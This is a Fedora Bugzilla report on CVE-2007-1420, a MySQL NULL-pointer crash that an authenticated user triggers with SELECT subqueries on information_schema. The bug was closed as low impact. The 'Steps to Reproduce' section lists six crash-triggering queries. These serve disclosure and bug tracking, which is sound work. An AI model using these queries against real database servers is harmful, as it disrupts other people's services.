Note: This is a beta release of Red Hat Bugzilla 5.0. The data contained within is a snapshot of the live data so any changes you make will not be reflected in the production Bugzilla. Also email is disabled so feel free to test any aspect of the site that you want. File any problems you find or give feedback here.
Bug 232604 - CVE-2007-1420 Single MySQL worker can be crashed (NULL deref) with certain SELECT statements
Summary: CVE-2007-1420 Single MySQL worker can be crashed (NULL deref) with certain SE...
Keywords:
Status: CLOSED WONTFIX
Alias: None
Product: Fedora
Classification: Fedora
Component: mysql
Version: 5
Hardware: All
OS: Linux
low
low
Target Milestone: ---
Assignee: Tom Lane
QA Contact: David Lawrence
URL: http://www.securityfocus.com/bid/2290...
Whiteboard: impact=low,source=gentoo,reported=200...
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 2007-03-16 12:19 UTC by Lubomir Kundrak
Modified: 2013-07-03 03:12 UTC (History)
2 users (show)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2007-08-02 12:25:15 UTC


Attachments (Terms of Use)

Description Lubomir Kundrak 2007-03-16 12:19:13 UTC
+++ This bug was initially created as a clone of Bug #232603 +++

Description of problem:

A NULL pointer dereference occurs after issuing the SELECT statements
below. Security impact is very limited, as only one worker crashes, leaving
the server running and ready for service. Additionally, an attacker must be
authenticated and permitted to execute arbitrary SELECT statements.

Version-Release number of selected component (if applicable):

Does not affect MySQL 4.

How reproducible:

Always, by an authenticated user.

Steps to Reproduce:

SELECT ASCII((SELECT table_name FROM information_schema.columns ORDER BY 1));
SELECT TRIM(LEADING FROM (SELECT table_name FROM information_schema.columns
ORDER BY 1));
SELECT SUBSTR((SELECT table_name FROM information_schema.tables ORDER BY 1),1,1);
SELECT UPPER((SELECT table_name FROM information_schema.tables ORDER BY 1));
SELECT RTRIM((SELECT table_name FROM information_schema.tables ORDER BY 1));
SELECT RPAD((SELECT table_name FROM information_schema.tables ORDER BY 1),1,'lol')
  
Actual results:

The session closes prematurely, fault message in the log file.

Expected results:

I expected it to crash. I like this section of a bug report.

Comment 1 Lubomir Kundrak 2007-03-16 12:20:31 UTC
Both FC5 and FC6.

Comment 2 Lubomir Kundrak 2007-08-02 12:25:15 UTC
Closing this -- there's FC5 is EOL, and anyways, there's no point in spending
time on fixing this, as it imposes no real threat and is triggerable only by
an authenticated user.


Note You need to log in before you can comment on or make changes to this bug.